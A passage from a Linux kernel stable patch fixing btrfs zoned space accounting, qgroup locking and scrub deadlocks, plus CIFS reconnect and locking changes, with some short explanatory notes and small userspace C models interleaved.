+ 		if (!cache) {
+ 			ret = -ENOENT;
+ 			break;
+ 		}
++		space_info = cache->space_info;
+ 		factor = btrfs_bg_type_to_factor(cache->flags);
+ 
+ 		/*
+@@ -3363,7 +3359,7 @@ int btrfs_update_block_group(struct btrfs_trans_handle *trans,
+ 		byte_in_group = bytenr - cache->start;
+ 		WARN_ON(byte_in_group > cache->length);
+ 
+-		spin_lock(&cache->space_info->lock);
++		spin_lock(&space_info->lock);
+ 		spin_lock(&cache->lock);
+ 
+ 		if (btrfs_test_opt(info, SPACE_CACHE) &&
+@@ -3376,23 +3372,23 @@ int btrfs_update_block_group(struct btrfs_trans_handle *trans,
+ 			old_val += num_bytes;
+ 			cache->used = old_val;
+ 			cache->reserved -= num_bytes;
+-			cache->space_info->bytes_reserved -= num_bytes;
+-			cache->space_info->bytes_used += num_bytes;
+-			cache->space_info->disk_used += num_bytes * factor;
++			space_info->bytes_reserved -= num_bytes;
++			space_info->bytes_used += num_bytes;
++			space_info->disk_used += num_bytes * factor;
+ 			spin_unlock(&cache->lock);
+-			spin_unlock(&cache->space_info->lock);
++			spin_unlock(&space_info->lock);
+ 		} else {
+ 			old_val -= num_bytes;
+ 			cache->used = old_val;
+ 			cache->pinned += num_bytes;
+-			btrfs_space_info_update_bytes_pinned(info,
+-					cache->space_info, num_bytes);
+-			cache->space_info->bytes_used -= num_bytes;
+-			cache->space_info->disk_used -= num_bytes * factor;
++			btrfs_space_info_update_bytes_pinned(info, space_info,
++							     num_bytes);
++			space_info->bytes_used -= num_bytes;
++			space_info->disk_used -= num_bytes * factor;
+ 
+ 			reclaim = should_reclaim_block_group(cache, num_bytes);
+ 			spin_unlock(&cache->lock);
+-			spin_unlock(&cache->space_info->lock);
++			spin_unlock(&space_info->lock);
+ 
+ 			set_extent_dirty(&trans->transaction->pinned_extents,
+ 					 bytenr, bytenr + num_bytes - 1,
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index 0d250d052487c..d84cef89cdff5 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -2693,8 +2693,13 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 		bg_reclaim_threshold = READ_ONCE(sinfo->bg_reclaim_threshold);
+ 
+ 	spin_lock(&ctl->tree_lock);
++	/* Count initial region as zone_unusable until it gets activated. */
+ 	if (!used)
+ 		to_free = size;
++	else if (initial &&
++		 test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &block_group->fs_info->flags) &&
++		 (block_group->flags & (BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_SYSTEM)))
++		to_free = 0;
+ 	else if (initial)
+ 		to_free = block_group->zone_capacity;
+ 	else if (offset >= block_group->alloc_offset)
+@@ -2722,7 +2727,8 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 	reclaimable_unusable = block_group->zone_unusable -
+ 			       (block_group->length - block_group->zone_capacity);
+ 	/* All the region is now unusable. Mark it as unused and reclaim */
+-	if (block_group->zone_unusable == block_group->length) {
++	if (block_group->zone_unusable == block_group->length &&
++	    block_group->alloc_offset) {
+ 		btrfs_mark_bg_unused(block_group);
+ 	} else if (bg_reclaim_threshold &&
+ 		   reclaimable_unusable >=
+diff --git a/fs/btrfs/fs.h b/fs/btrfs/fs.h
+index 3d8156fc8523f..f180ca061aef4 100644
+--- a/fs/btrfs/fs.h
++++ b/fs/btrfs/fs.h
+@@ -119,11 +119,8 @@ enum {
+ 	/* Indicate that we want to commit the transaction. */
+ 	BTRFS_FS_NEED_TRANS_COMMIT,
+ 
+-	/*
+-	 * Indicate metadata over-commit is disabled. This is set when active
+-	 * zone tracking is needed.
+-	 */
+-	BTRFS_FS_NO_OVERCOMMIT,
++	/* This is set when active zone tracking is needed. */
++	BTRFS_FS_ACTIVE_ZONE_TRACKING,
+ 
+ 	/*
+ 	 * Indicate if we have some features changed, this is mostly for
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 7e348bd2ccdeb..c232636ecdfea 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -3731,7 +3731,9 @@ static long btrfs_ioctl_qgroup_assign(struct file *file, void __user *arg)
+ 	}
+ 
+ 	/* update qgroup status and info */
++	mutex_lock(&fs_info->qgroup_ioctl_lock);
+ 	err = btrfs_run_qgroups(trans);
++	mutex_unlock(&fs_info->qgroup_ioctl_lock);
+ 	if (err < 0)
+ 		btrfs_handle_fs_error(fs_info, err,
+ 				      "failed to update qgroup status and info");
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index af97413abcf43..abf2b7f143078 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -2828,13 +2828,22 @@ cleanup:
+ }
+ 
+ /*
+- * called from commit_transaction. Writes all changed qgroups to disk.
++ * Writes all changed qgroups to disk.
++ * Called by the transaction commit path and the qgroup assign ioctl.
+  */
+ int btrfs_run_qgroups(struct btrfs_trans_handle *trans)
+ {
+ 	struct btrfs_fs_info *fs_info = trans->fs_info;
+ 	int ret = 0;
+ 
++	/*
++	 * In case we are called from the qgroup assign ioctl, assert that we
++	 * are holding the qgroup_ioctl_lock, otherwise we can race with a quota
++	 * disable operation (ioctl) and access a freed quota root.
++	 */
++	if (trans->transaction->state != TRANS_STATE_COMMIT_DOING)
++		lockdep_assert_held(&fs_info->qgroup_ioctl_lock);
++
+ 	if (!fs_info->quota_root)
+ 		return ret;
+ 
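
btrfs_run_qgroups() is now reachable from both the commit path and the assign ioctl, and the assertion documents that only the ioctl path must hold qgroup_ioctl_lock. A userspace model of a context-dependent lock assertion:

#include <assert.h>
#include <stdbool.h>
#include <stdio.h>

enum state { COMMIT_DOING, OTHER };

static bool ioctl_lock_held;

static void run_qgroups(enum state s)
{
    if (s != COMMIT_DOING)
        assert(ioctl_lock_held);   /* models lockdep_assert_held() */
    printf("qgroups flushed\n");
}

int main(void)
{
    ioctl_lock_held = true;        /* ioctl path takes the mutex first */
    run_qgroups(OTHER);
    run_qgroups(COMMIT_DOING);     /* commit path: serialized elsewhere */
    return 0;
}
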
+diff --git a/fs/btrfs/space-info.c b/fs/btrfs/space-info.c
+index 69c09508afb50..3eecce86f63fc 100644
+--- a/fs/btrfs/space-info.c
++++ b/fs/btrfs/space-info.c
+@@ -308,8 +308,6 @@ void btrfs_add_bg_to_space_info(struct btrfs_fs_info *info,
+ 	ASSERT(found);
+ 	spin_lock(&found->lock);
+ 	found->total_bytes += block_group->length;
+-	if (test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &block_group->runtime_flags))
+-		found->active_total_bytes += block_group->length;
+ 	found->disk_total += block_group->length * factor;
+ 	found->bytes_used += block_group->used;
+ 	found->disk_used += block_group->used * factor;
+@@ -379,22 +377,6 @@ static u64 calc_available_free_space(struct btrfs_fs_info *fs_info,
+ 	return avail;
+ }
+ 
+-static inline u64 writable_total_bytes(struct btrfs_fs_info *fs_info,
+-				       struct btrfs_space_info *space_info)
+-{
+-	/*
+-	 * On regular filesystem, all total_bytes are always writable. On zoned
+-	 * filesystem, there may be a limitation imposed by max_active_zones.
+-	 * For metadata allocation, we cannot finish an existing active block
+-	 * group to avoid a deadlock. Thus, we need to consider only the active
+-	 * groups to be writable for metadata space.
+-	 */
+-	if (!btrfs_is_zoned(fs_info) || (space_info->flags & BTRFS_BLOCK_GROUP_DATA))
+-		return space_info->total_bytes;
+-
+-	return space_info->active_total_bytes;
+-}
+-
+ int btrfs_can_overcommit(struct btrfs_fs_info *fs_info,
+ 			 struct btrfs_space_info *space_info, u64 bytes,
+ 			 enum btrfs_reserve_flush_enum flush)
+@@ -407,13 +389,13 @@ int btrfs_can_overcommit(struct btrfs_fs_info *fs_info,
+ 		return 0;
+ 
+ 	used = btrfs_space_info_used(space_info, true);
+-	if (test_bit(BTRFS_FS_NO_OVERCOMMIT, &fs_info->flags) &&
++	if (test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &fs_info->flags) &&
+ 	    (space_info->flags & BTRFS_BLOCK_GROUP_METADATA))
+ 		avail = 0;
+ 	else
+ 		avail = calc_available_free_space(fs_info, space_info, flush);
+ 
+-	if (used + bytes < writable_total_bytes(fs_info, space_info) + avail)
++	if (used + bytes < space_info->total_bytes + avail)
+ 		return 1;
+ 	return 0;
+ }
+@@ -449,7 +431,7 @@ again:
+ 		ticket = list_first_entry(head, struct reserve_ticket, list);
+ 
+ 		/* Check and see if our ticket can be satisfied now. */
+-		if ((used + ticket->bytes <= writable_total_bytes(fs_info, space_info)) ||
++		if ((used + ticket->bytes <= space_info->total_bytes) ||
+ 		    btrfs_can_overcommit(fs_info, space_info, ticket->bytes,
+ 					 flush)) {
+ 			btrfs_space_info_update_bytes_may_use(fs_info,
+@@ -829,7 +811,6 @@ btrfs_calc_reclaim_metadata_size(struct btrfs_fs_info *fs_info,
+ {
+ 	u64 used;
+ 	u64 avail;
+-	u64 total;
+ 	u64 to_reclaim = space_info->reclaim_size;
+ 
+ 	lockdep_assert_held(&space_info->lock);
+@@ -844,9 +825,8 @@ btrfs_calc_reclaim_metadata_size(struct btrfs_fs_info *fs_info,
+ 	 * space.  If that's the case add in our overage so we make sure to put
+ 	 * appropriate pressure on the flushing state machine.
+ 	 */
+-	total = writable_total_bytes(fs_info, space_info);
+-	if (total + avail < used)
+-		to_reclaim += used - (total + avail);
++	if (space_info->total_bytes + avail < used)
++		to_reclaim += used - (space_info->total_bytes + avail);
+ 
+ 	return to_reclaim;
+ }
+@@ -856,11 +836,10 @@ static bool need_preemptive_reclaim(struct btrfs_fs_info *fs_info,
+ {
+ 	u64 global_rsv_size = fs_info->global_block_rsv.reserved;
+ 	u64 ordered, delalloc;
+-	u64 total = writable_total_bytes(fs_info, space_info);
+ 	u64 thresh;
+ 	u64 used;
+ 
+-	thresh = mult_perc(total, 90);
++	thresh = mult_perc(space_info->total_bytes, 90);
+ 
+ 	lockdep_assert_held(&space_info->lock);
+ 
+@@ -923,8 +902,8 @@ static bool need_preemptive_reclaim(struct btrfs_fs_info *fs_info,
+ 					   BTRFS_RESERVE_FLUSH_ALL);
+ 	used = space_info->bytes_used + space_info->bytes_reserved +
+ 	       space_info->bytes_readonly + global_rsv_size;
+-	if (used < total)
+-		thresh += total - used;
++	if (used < space_info->total_bytes)
++		thresh += space_info->total_bytes - used;
+ 	thresh >>= space_info->clamp;
+ 
+ 	used = space_info->bytes_pinned;
+@@ -1651,7 +1630,7 @@ static int __reserve_bytes(struct btrfs_fs_info *fs_info,
+ 	 * can_overcommit() to ensure we can overcommit to continue.
+ 	 */
+ 	if (!pending_tickets &&
+-	    ((used + orig_bytes <= writable_total_bytes(fs_info, space_info)) ||
++	    ((used + orig_bytes <= space_info->total_bytes) ||
+ 	     btrfs_can_overcommit(fs_info, space_info, orig_bytes, flush))) {
+ 		btrfs_space_info_update_bytes_may_use(fs_info, space_info,
+ 						      orig_bytes);
+@@ -1665,8 +1644,7 @@ static int __reserve_bytes(struct btrfs_fs_info *fs_info,
+ 	 */
+ 	if (ret && unlikely(flush == BTRFS_RESERVE_FLUSH_EMERGENCY)) {
+ 		used = btrfs_space_info_used(space_info, false);
+-		if (used + orig_bytes <=
+-		    writable_total_bytes(fs_info, space_info)) {
++		if (used + orig_bytes <= space_info->total_bytes) {
+ 			btrfs_space_info_update_bytes_may_use(fs_info, space_info,
+ 							      orig_bytes);
+ 			ret = 0;
+diff --git a/fs/btrfs/space-info.h b/fs/btrfs/space-info.h
+index fc99ea2b0c34f..2033b71b18cec 100644
+--- a/fs/btrfs/space-info.h
++++ b/fs/btrfs/space-info.h
+@@ -96,8 +96,6 @@ struct btrfs_space_info {
+ 	u64 bytes_may_use;	/* number of bytes that may be used for
+ 				   delalloc/allocations */
+ 	u64 bytes_readonly;	/* total bytes that are read only */
+-	/* Total bytes in the space, but only accounts active block groups. */
+-	u64 active_total_bytes;
+ 	u64 bytes_zone_unusable;	/* total bytes that are unusable until
+ 					   resetting the device zone */
+ 
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index 8f8d0fce6e4a3..9094e2402922c 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -2035,7 +2035,20 @@ static void cleanup_transaction(struct btrfs_trans_handle *trans, int err)
+ 
+ 	if (current->journal_info == trans)
+ 		current->journal_info = NULL;
+-	btrfs_scrub_cancel(fs_info);
++
++	/*
++	 * If relocation is running, we can't cancel scrub because that will
++	 * result in a deadlock. Before relocating a block group, relocation
++	 * pauses scrub, then starts and commits a transaction before unpausing
++	 * scrub. If the transaction commit is being done by the relocation
++	 * task or triggered by another task and the relocation task is waiting
++	 * for the commit, and we end up here due to an error in the commit
++	 * path, then calling btrfs_scrub_cancel() will deadlock, as we are
++	 * asking scrub to stop while it has already been asked to pause
++	 * earlier in the relocation code.
++	 */
++	if (!test_bit(BTRFS_FS_RELOC_RUNNING, &fs_info->flags))
++		btrfs_scrub_cancel(fs_info);
+ 
+ 	kmem_cache_free(btrfs_trans_handle_cachep, trans);
+ }
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index df43093b7a46d..fe652f8fc697b 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -1366,8 +1366,17 @@ struct btrfs_device *btrfs_scan_one_device(const char *path, fmode_t flags,
+ 	 * So, we need to add a special mount option to scan for
+ 	 * later supers, using BTRFS_SUPER_MIRROR_MAX instead
+ 	 */
+-	flags |= FMODE_EXCL;
+ 
++	/*
++	 * Avoid using flags |= FMODE_EXCL here, as systemd-udev may
++	 * initiate the device scan which may race with the user's mount
++	 * or mkfs command, resulting in failure.
++	 * Since the device scan is solely for reading purposes, there is
++	 * no need for FMODE_EXCL. Additionally, the devices are read again
++	 * during the mount process. It is ok to get some inconsistent
++	 * values temporarily, as the device paths of the fsid are the only
++	 * required information for assembling the volume.
++	 */
+ 	bdev = blkdev_get_by_path(path, flags, holder);
+ 	if (IS_ERR(bdev))
+ 		return ERR_CAST(bdev);
+@@ -3266,8 +3275,15 @@ int btrfs_relocate_chunk(struct btrfs_fs_info *fs_info, u64 chunk_offset)
+ 	btrfs_scrub_pause(fs_info);
+ 	ret = btrfs_relocate_block_group(fs_info, chunk_offset);
+ 	btrfs_scrub_continue(fs_info);
+-	if (ret)
++	if (ret) {
++		/*
++		 * If we had a transaction abort, stop all running scrubs.
++		 * See transaction.c:cleanup_transaction() why we do it here.
++		 */
++		if (BTRFS_FS_ERROR(fs_info))
++			btrfs_scrub_cancel(fs_info);
+ 		return ret;
++	}
+ 
+ 	block_group = btrfs_lookup_block_group(fs_info, chunk_offset);
+ 	if (!block_group)
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index f3b7d8ae93a9f..ce5ebba7fdd9a 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -539,8 +539,7 @@ int btrfs_get_dev_zone_info(struct btrfs_device *device, bool populate_cache)
+ 		}
+ 		atomic_set(&zone_info->active_zones_left,
+ 			   max_active_zones - nactive);
+-		/* Overcommit does not work well with active zone tacking. */
+-		set_bit(BTRFS_FS_NO_OVERCOMMIT, &fs_info->flags);
++		set_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &fs_info->flags);
+ 	}
+ 
+ 	/* Validate superblock log */
+@@ -1577,9 +1576,19 @@ void btrfs_calc_zone_unusable(struct btrfs_block_group *cache)
+ 		return;
+ 
+ 	WARN_ON(cache->bytes_super != 0);
+-	unusable = (cache->alloc_offset - cache->used) +
+-		   (cache->length - cache->zone_capacity);
+-	free = cache->zone_capacity - cache->alloc_offset;
++
++	/* Check for block groups that never got activated */
++	if (test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &cache->fs_info->flags) &&
++	    cache->flags & (BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_SYSTEM) &&
++	    !test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &cache->runtime_flags) &&
++	    cache->alloc_offset == 0) {
++		unusable = cache->length;
++		free = 0;
++	} else {
++		unusable = (cache->alloc_offset - cache->used) +
++			   (cache->length - cache->zone_capacity);
++		free = cache->zone_capacity - cache->alloc_offset;
++	}
+ 
+ 	/* We only need ->free_space in ALLOC_SEQ block groups */
+ 	cache->cached = BTRFS_CACHE_FINISHED;
+@@ -1916,7 +1925,11 @@ bool btrfs_zone_activate(struct btrfs_block_group *block_group)
+ 
+ 	/* Successfully activated all the zones */
+ 	set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &block_group->runtime_flags);
+-	space_info->active_total_bytes += block_group->length;
++	WARN_ON(block_group->alloc_offset != 0);
++	if (block_group->zone_unusable == block_group->length) {
++		block_group->zone_unusable = block_group->length - block_group->zone_capacity;
++		space_info->bytes_zone_unusable -= block_group->zone_capacity;
++	}
+ 	spin_unlock(&block_group->lock);
+ 	btrfs_try_granting_tickets(fs_info, space_info);
+ 	spin_unlock(&space_info->lock);
+@@ -2280,7 +2293,7 @@ int btrfs_zone_finish_one_bg(struct btrfs_fs_info *fs_info)
+ 		u64 avail;
+ 
+ 		spin_lock(&block_group->lock);
+-		if (block_group->reserved ||
++		if (block_group->reserved || block_group->alloc_offset == 0 ||
+ 		    (block_group->flags & BTRFS_BLOCK_GROUP_SYSTEM)) {
+ 			spin_unlock(&block_group->lock);
+ 			continue;
+@@ -2317,10 +2330,6 @@ int btrfs_zoned_activate_one_bg(struct btrfs_fs_info *fs_info,
+ 	if (!btrfs_is_zoned(fs_info) || (space_info->flags & BTRFS_BLOCK_GROUP_DATA))
+ 		return 0;
+ 
+-	/* No more block groups to activate */
+-	if (space_info->active_total_bytes == space_info->total_bytes)
+-		return 0;
+-
+ 	for (;;) {
+ 		int ret;
+ 		bool need_finish = false;
+diff --git a/fs/cifs/cifsfs.h b/fs/cifs/cifsfs.h
+index 63a0ac2b93558..16a703c683b77 100644
+--- a/fs/cifs/cifsfs.h
++++ b/fs/cifs/cifsfs.h
+@@ -118,7 +118,10 @@ extern const struct dentry_operations cifs_ci_dentry_ops;
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ extern struct vfsmount *cifs_dfs_d_automount(struct path *path);
+ #else
+-#define cifs_dfs_d_automount NULL
++static inline struct vfsmount *cifs_dfs_d_automount(struct path *path)
++{
++	return ERR_PTR(-EREMOTE);
++}
+ #endif
+ 
+ /* Functions related to symlinks */
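
Replacing the NULL define with an inline stub means callers may invoke the automount op unconditionally and get a sane error instead of jumping through a null pointer. A userspace model of the difference (ERR_PTR and EREMOTE loosely modeled):

#include <stdio.h>

#define EREMOTE 66
static inline void *ERR_PTR(long e) { return (void *)e; }

static inline void *dfs_automount_stub(void)
{
    return ERR_PTR(-EREMOTE);   /* "object is remote" instead of a NULL call */
}

int main(void)
{
    void *v = dfs_automount_stub();
    printf("automount -> %ld\n", (long)v);  /* -66, i.e. -EREMOTE */
    return 0;
}
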
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+index e75184544ecb4..639df85dafd6c 100644
+--- a/fs/cifs/cifsproto.h
++++ b/fs/cifs/cifsproto.h
+@@ -697,5 +697,6 @@ static inline int cifs_create_options(struct cifs_sb_info *cifs_sb, int options)
+ 
+ struct super_block *cifs_get_tcon_super(struct cifs_tcon *tcon);
+ void cifs_put_tcon_super(struct super_block *sb);
++int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry);
+ 
+ #endif			/* _CIFSPROTO_H */
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+index 566e6a26b897c..f71f8533c2f4d 100644
+--- a/fs/cifs/cifssmb.c
++++ b/fs/cifs/cifssmb.c
+@@ -70,7 +70,6 @@ cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+ 	struct cifs_ses *ses;
+ 	struct TCP_Server_Info *server;
+ 	struct nls_table *nls_codepage;
+-	int retries;
+ 
+ 	/*
+ 	 * SMBs NegProt, SessSetup, uLogoff do not have tcon yet so check for
+@@ -98,45 +97,9 @@ cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+ 	}
+ 	spin_unlock(&tcon->tc_lock);
+ 
+-	retries = server->nr_targets;
+-
+-	/*
+-	 * Give demultiplex thread up to 10 seconds to each target available for
+-	 * reconnect -- should be greater than cifs socket timeout which is 7
+-	 * seconds.
+-	 */
+-	while (server->tcpStatus == CifsNeedReconnect) {
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      10 * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to a received signal by the process\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			break;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		if (retries && --retries)
+-			continue;
+-
+-		/*
+-		 * on "soft" mounts we wait once. Hard mounts keep
+-		 * retrying until process is killed or server comes
+-		 * back on-line
+-		 */
+-		if (!tcon->retry) {
+-			cifs_dbg(FYI, "gave up waiting on reconnect in smb_init\n");
+-			return -EHOSTDOWN;
+-		}
+-		retries = server->nr_targets;
+-	}
++	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
++	if (rc)
++		return rc;
+ 
+ 	spin_lock(&ses->chan_lock);
+ 	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+@@ -4414,8 +4377,13 @@ CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses,
+ 		return -ENODEV;
+ 
+ getDFSRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, ses->tcon_ipc, (void **) &pSMB,
+-		      (void **) &pSMBr);
++	/*
++	 * Use smb_init_no_reconnect() instead of smb_init() as
++	 * CIFSGetDFSRefer() may be called from cifs_reconnect_tcon() and thus
++	 * causing an infinite recursion.
++	 */
++	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, ses->tcon_ipc,
++				   (void **)&pSMB, (void **)&pSMBr);
+ 	if (rc)
+ 		return rc;
+ 
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 6da2af97b8bac..985e962cf0858 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -244,31 +244,42 @@ cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
+ 			cifs_chan_update_iface(ses, server);
+ 
+ 		spin_lock(&ses->chan_lock);
+-		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server))
+-			goto next_session;
++		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server)) {
++			spin_unlock(&ses->chan_lock);
++			continue;
++		}
+ 
+ 		if (mark_smb_session)
+ 			CIFS_SET_ALL_CHANS_NEED_RECONNECT(ses);
+ 		else
+ 			cifs_chan_set_need_reconnect(ses, server);
+ 
++		cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
++			 __func__, ses->chans_need_reconnect);
++
+ 		/* If all channels need reconnect, then tcon needs reconnect */
+-		if (!mark_smb_session && !CIFS_ALL_CHANS_NEED_RECONNECT(ses))
+-			goto next_session;
++		if (!mark_smb_session && !CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++			spin_unlock(&ses->chan_lock);
++			continue;
++		}
++		spin_unlock(&ses->chan_lock);
+ 
++		spin_lock(&ses->ses_lock);
+ 		ses->ses_status = SES_NEED_RECON;
++		spin_unlock(&ses->ses_lock);
+ 
+ 		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 			tcon->need_reconnect = true;
++			spin_lock(&tcon->tc_lock);
+ 			tcon->status = TID_NEED_RECON;
++			spin_unlock(&tcon->tc_lock);
+ 		}
+ 		if (ses->tcon_ipc) {
+ 			ses->tcon_ipc->need_reconnect = true;
++			spin_lock(&ses->tcon_ipc->tc_lock);
+ 			ses->tcon_ipc->status = TID_NEED_RECON;
++			spin_unlock(&ses->tcon_ipc->tc_lock);
+ 		}
+-
+-next_session:
+-		spin_unlock(&ses->chan_lock);
+ 	}
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ }
+@@ -3703,11 +3714,19 @@ cifs_negotiate_protocol(const unsigned int xid, struct cifs_ses *ses,
+ 
+ 	/* only send once per connect */
+ 	spin_lock(&server->srv_lock);
+-	if (!server->ops->need_neg(server) ||
++	if (server->tcpStatus != CifsGood &&
++	    server->tcpStatus != CifsNew &&
+ 	    server->tcpStatus != CifsNeedNegotiate) {
++		spin_unlock(&server->srv_lock);
++		return -EHOSTDOWN;
++	}
++
++	if (!server->ops->need_neg(server) &&
++	    server->tcpStatus == CifsGood) {
+ 		spin_unlock(&server->srv_lock);
+ 		return 0;
+ 	}
++
+ 	server->tcpStatus = CifsInNegotiate;
+ 	spin_unlock(&server->srv_lock);
+ 
+@@ -3735,39 +3754,48 @@ cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
+ 		   struct nls_table *nls_info)
+ {
+ 	int rc = -ENOSYS;
+-	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&server->dstaddr;
+-	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
++	struct TCP_Server_Info *pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&pserver->dstaddr;
++	struct sockaddr_in *addr = (struct sockaddr_in *)&pserver->dstaddr;
+ 	bool is_binding = false;
+ 
+ 	spin_lock(&ses->ses_lock);
+-	if (server->dstaddr.ss_family == AF_INET6)
+-		scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI6", &addr6->sin6_addr);
+-	else
+-		scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI4", &addr->sin_addr);
++	cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
++		 __func__, ses->chans_need_reconnect);
+ 
+ 	if (ses->ses_status != SES_GOOD &&
+ 	    ses->ses_status != SES_NEW &&
+ 	    ses->ses_status != SES_NEED_RECON) {
+ 		spin_unlock(&ses->ses_lock);
+-		return 0;
++		return -EHOSTDOWN;
+ 	}
+ 
+ 	/* only send once per connect */
+ 	spin_lock(&ses->chan_lock);
+-	if (CIFS_ALL_CHANS_GOOD(ses) ||
+-	    cifs_chan_in_reconnect(ses, server)) {
++	if (CIFS_ALL_CHANS_GOOD(ses)) {
++		if (ses->ses_status == SES_NEED_RECON)
++			ses->ses_status = SES_GOOD;
+ 		spin_unlock(&ses->chan_lock);
+ 		spin_unlock(&ses->ses_lock);
+ 		return 0;
+ 	}
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
++
+ 	cifs_chan_set_in_reconnect(ses, server);
++	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+ 	spin_unlock(&ses->chan_lock);
+ 
+ 	if (!is_binding)
+ 		ses->ses_status = SES_IN_SETUP;
+ 	spin_unlock(&ses->ses_lock);
+ 
++	/* update ses ip_addr only for primary chan */
++	if (server == pserver) {
++		if (server->dstaddr.ss_family == AF_INET6)
++			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI6", &addr6->sin6_addr);
++		else
++			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI4", &addr->sin_addr);
++	}
++
+ 	if (!is_binding) {
+ 		ses->capabilities = server->capabilities;
+ 		if (!linuxExtEnabled)
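
The connect.c hunks above replace the next_session label with explicit
unlock-and-continue paths, so ses->chan_lock is never held while
ses->ses_lock or a tcon's tc_lock is taken; each spinlock is acquired
and released on its own. A minimal sketch of that locking discipline,
using simplified stand-in names rather than the real cifs definitions:

	#include <linux/spinlock.h>

	struct demo_ses {
		spinlock_t chan_lock;		/* guards chans_need_reconnect */
		spinlock_t ses_lock;		/* guards ses_status */
		unsigned long chans_need_reconnect;
		int ses_status;			/* 1 stands in for SES_NEED_RECON */
	};

	static void demo_mark_need_recon(struct demo_ses *ses)
	{
		spin_lock(&ses->chan_lock);
		if (!ses->chans_need_reconnect) {
			/* early exit: unlock here instead of a goto label */
			spin_unlock(&ses->chan_lock);
			return;
		}
		spin_unlock(&ses->chan_lock);	/* drop before taking ses_lock */

		spin_lock(&ses->ses_lock);
		ses->ses_status = 1;
		spin_unlock(&ses->ses_lock);
	}
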
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 9f4486b705d5c..5542893ef03f7 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -1376,3 +1376,47 @@ int cifs_inval_name_dfs_link_error(const unsigned int xid,
+ 	return 0;
+ }
+ #endif
++
++int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry)
++{
++	int timeout = 10;
++	int rc;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus != CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++	timeout *= server->nr_targets;
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * Give the demultiplex thread up to 10 seconds for each target
++	 * available for reconnect -- should be greater than the cifs socket
++	 * timeout, which is 7 seconds.
++	 *
++	 * On "soft" mounts we wait once. Hard mounts keep retrying until
++	 * process is killed or server comes back on-line.
++	 */
++	do {
++		rc = wait_event_interruptible_timeout(server->response_q,
++						      (server->tcpStatus != CifsNeedReconnect),
++						      timeout * HZ);
++		if (rc < 0) {
++			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
++				 __func__);
